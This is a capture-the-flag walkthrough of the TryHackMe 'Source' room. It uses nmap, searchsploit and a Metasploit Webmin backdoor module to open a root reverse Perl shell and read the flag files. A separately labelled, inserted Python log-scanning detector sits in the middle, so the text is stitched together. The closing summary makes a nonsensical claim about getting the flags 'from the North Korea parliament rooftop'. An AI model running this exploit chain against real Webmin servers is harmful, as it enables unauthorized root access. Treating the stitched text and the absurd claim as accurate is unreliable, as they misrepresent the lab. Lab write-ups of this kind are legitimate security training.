Tryhackme - Source


In this walkthrough, we will go through the Source room from Tryhackme. The room is rated easy on the platform and is based on exploiting a recent vulnerability in Webmin, a web-based system configuration tool. On that note, let’s get started without any delay.


Machine Info:

Objective: Enumerate and root the box attached to this task. Can you discover the source of the disruption and leverage it to take control?

Task 1 – Embark


  • I started with our good old nmap scan and found two ports open – 22 (SSH) and 10000 (Webmin). The latter is an interesting one. Let’s find out more.

sudo nmap -sS -sV 


  • I can see there is a login portal on port 10000. I tried the default Webmin credentials (admin:admin), but no luck.


  • Next, I searched for Webmin 1.890 in searchsploit to see if any public exploit is available for it. Found one, and a Metasploit module at that. Nothing can be better than this.

searchsploit webmin 1.890


Exploitation and getting root:

  • Moving on, I used the “Webmin password_change.cgi Backdoor” exploit to get a root shell and eventually the two required flags.

wh1terose@fsociety:~$ msfconsole

[*] Starting persistent handler(s)...

msf6 > search webmin

Matching Modules

   7  exploit/linux/http/webmin_backdoor             2019-08-10       excellent  Yes    Webmin password_change.cgi Backdoor

msf6 > use exploit/unix/webapp/webmin_backdoor

msf6 exploit(unix/webapp/webmin_backdoor) > set LHOST
msf6 exploit(unix/webapp/webmin_backdoor) > set RHOSTS 
msf6 exploit(unix/webapp/webmin_backdoor) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true

msf6 exploit(unix/webapp/webmin_backdoor) > exploit

[*] Started reverse TCP handler on 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened ( -> at 2023-06-07 23:58:55 +0530

uid=0(root) gid=0(root) groups=0(root)

find / -name user.txt -type f 2>/dev/null
cat /home/dark/user.txt
cat /root/root.txt
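
On the defending side, the trace this attack leaves is a request to password_change.cgi from a client that never logged in. The following is an added example, not part of the original walkthrough: it scans access-log lines for that endpoint. The Common Log Format layout (assumed for Webmin's miniserv.log), the sample lines and the function names are assumptions made for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed layout: Common Log Format, as written to Webmin's miniserv.log.
CLF = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                 r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')
WATCHED = "/password_change.cgi"  # endpoint named in the module title above

# Constructed sample lines (documentation-range addresses, invented timestamps).
SAMPLE_LOG = """\
203.0.113.7 - - [07/Jun/2023:23:50:12 +0530] "GET / HTTP/1.1" 200 4120
203.0.113.7 - - [07/Jun/2023:23:51:40 +0530] "POST /session_login.cgi HTTP/1.1" 401 2210
203.0.113.7 - - [07/Jun/2023:23:58:50 +0530] "GET //password_change.cgi?x=1 HTTP/1.1" 200 310
203.0.113.7 - - [07/Jun/2023:23:58:54 +0530] "POST /%70assword_change.cgi HTTP/1.1" 200 1542
198.51.100.20 - admin [08/Jun/2023:09:02:11 +0530] "GET /sysinfo.cgi HTTP/1.1" 200 9875
this line is not in the expected format
"""

def normalize(target):
    """Strip the query, percent-decode, collapse slashes and dot segments, lower-case."""
    path = unquote(target.split("?", 1)[0])
    return posixpath.normpath(re.sub(r"/+", "/", path)).lower()

def find_hits(log_text):
    """Return one record per request that reaches the watched endpoint."""
    hits = []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m or normalize(m["target"]) != WATCHED:
            continue  # unparseable or unrelated line
        # An unauthenticated POST is the case to escalate; anything else is for review.
        urgent = m["method"] == "POST" and m["user"] == "-"
        hits.append({"ip": m["ip"], "time": m["ts"], "method": m["method"],
                     "status": int(m["status"]),
                     "severity": "high" if urgent else "review"})
    return hits

if __name__ == "__main__":
    for hit in find_hits(SAMPLE_LOG):
        print(hit)
```

The path is normalized before comparison so that doubled slashes, percent-encoding or a query string do not hide the request from the match.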


Question 1 – user.txt


Question 2 – root.txt





So that was “Source” for you. Let’s sum it up quickly. We started off with a regular nmap scan with version detection and found two ports open – 22 (SSH) and 10000 (Webmin). Next, we checked the Webmin login panel and tried some default usernames and passwords, but had no luck. Next, we searched for the Webmin version in searchsploit and got a hit for a known Metasploit exploit. At last, we used the Metasploit Webmin exploit module to get RCE on the server and got the flags from the North Korea parliament rooftop. On that note, I will take your leave and will see you in the next one. Till then, “Hack the Planet”.
